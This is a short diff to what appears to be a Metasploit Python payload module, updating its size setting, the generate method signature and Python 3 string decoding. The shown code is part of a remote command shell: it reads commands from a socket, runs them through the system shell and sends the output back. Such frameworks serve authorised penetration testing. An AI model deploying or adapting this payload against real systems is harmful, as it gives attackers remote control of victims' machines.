@@ -1,7 +1,7 @@
 
 module MetasploitModule
 
-  CachedSize = 481
+  CachedSize = :dynamic
 
   include Msf::Payload::Single
   include Msf::Payload::Python
@@ -26,7 +26,7 @@ module MetasploitModule
       ))
   end
 
-  def generate
+  def generate(_opts = {})
     super + command_string
   end
 
@@ -42,7 +42,7 @@ module MetasploitModule
       	d=so.recv(1024)
       	if len(d)==0:
       		break
-      	p=r.Popen(d,shell=True,stdin=r.PIPE,stdout=r.PIPE,stderr=r.PIPE)
+      	p=r.Popen(d.decode('utf-8'),shell=True,stdin=r.PIPE,stdout=r.PIPE,stderr=r.PIPE)
       	o=p.stdout.read()+p.stderr.read()
       	so.send(o)
     PYTHON
